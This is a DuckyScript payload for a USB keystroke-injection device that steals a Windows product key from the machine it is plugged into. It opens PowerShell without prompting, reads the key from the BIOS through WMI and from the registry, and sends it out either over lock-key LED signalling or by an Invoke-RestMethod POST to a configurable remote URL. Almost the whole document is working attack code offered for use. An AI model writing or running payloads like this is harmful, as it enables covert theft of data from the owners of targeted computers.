REM WindowsLicenseKeyExfiltration REM Version 1.0 REM OS: Windows REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry. REM Extension made by Korben for checking if Target is Windows OS EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT REM VERSION 1.1 REM AUTHOR: Korben REM_BLOCK DOCUMENTATION Windows fully passive OS Detection and passive Detect Ready Includes its own passive detect ready. Does not require additional extensions. USAGE: Extension runs inline (here) Place at beginning of payload (besides ATTACKMODE) to act as dynamic boot delay $_OS will be set to WINDOWS or NOT_WINDOWS See end of payload for usage within payload END_REM REM CONFIGURATION: DEFINE #MAX_WAIT 150 DEFINE #CHECK_INTERVAL 20 DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 DEFINE #NOT_WINDOWS 7 $_OS = #NOT_WINDOWS VAR $MAX_TRIES = #MAX_WAIT WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) DELAY #CHECK_INTERVAL $MAX_TRIES = ($MAX_TRIES - 1) END_WHILE IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN $_OS = WINDOWS END_IF REM_BLOCK EXAMPLE USAGE AFTER EXTENSION IF ($_OS == WINDOWS) THEN STRING HELLO WINDOWS! ELSE STRING HELLO WORLD! END_IF END_REM END_EXTENSION REM Extension made by 0i41E to signalize the payloads end EXTENSION DETECT_FINISHED REM VERSION 1.0 REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: Use the function Detect_Finished() to signal the finished execution of your payload. END_REM REM CONFIGURATION: DEFINE #PAUSE 150 FUNCTION Detect_Finished() IF ($_CAPSLOCK_ON == FALSE) CAPSLOCK DELAY #PAUSE CAPSLOCK DELAY #PAUSE CAPSLOCK DELAY #PAUSE CAPSLOCK ATTACKMODE OFF ELSE IF CAPSLOCK DELAY #PAUSE CAPSLOCK DELAY #PAUSE CAPSLOCK ATTACKMODE OFF END_IF END_FUNCTION END_EXTENSION REM Extension made by 0i41E for fileless exfiltration via Lock Keys EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method. TARGET: Windows Hosts that supports powershell and SendKeys USAGE: Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it. It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated. Example Usage: GUI r DELAY 500 STRINGLN powershell DELAY 1000 STRING echo "This is my test" Windows_Fileless_HID_Exfil() END_REM FUNCTION Windows_Fileless_HID_Exfil() DELAY 250 REM Saving current Keyboard lock keys SAVE_HOST_KEYBOARD_LOCK_STATE $_EXFIL_MODE_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE DELAY 500 REM Setting the output as variable STRING |Out-String|Set-Variable -Name "DD"; REM Converting output into Lock Key values STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}'; REM Exfiltrating via Keystroke Reflection STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete. WAIT_FOR_SCROLL_CHANGE LED_G $_EXFIL_MODE_ENABLED = FALSE RESTORE_HOST_KEYBOARD_LOCK_STATE END_FUNCTION END_EXTENSION REM If set to TRUE, keys will be send via PowerShells Invoke-Restmethod DEFINE #REMOTE_EXFIL FALSE REM Define the remote host to which the keys shall be send to. (Only when REMOTE_EXFIL is set to TRUE!) DEFINE #URL REM If Target is Windows, execute payload IF ($_OS == WINDOWS) THEN GUI r DELAY 500 STRINGLN powershell -nop -noni DELAY 1000 STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green DELAY 300 REM Dumping License key when saved in Bios STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey; REM Dumping License key via registry STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault" REM Executing Get_License STRING ;IeX $Get_License REM If REMOTE_EXFIL is set to TRUE,exfiltrate keys to remote host IF_DEFINED_TRUE #REMOTE_EXFIL DELAY 500 REM Setting the output as variable & sending it to defined remote host STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit DELAY 150 Detect_Finished() ELSE_DEFINED REM Exfiltrating License key via Keystroke Reflection Windows_Fileless_HID_Exfil() DELAY 150 Detect_Finished() END_IF_DEFINED REM If System is not Windows... ELSE ATTACKMODE STORAGE END_IF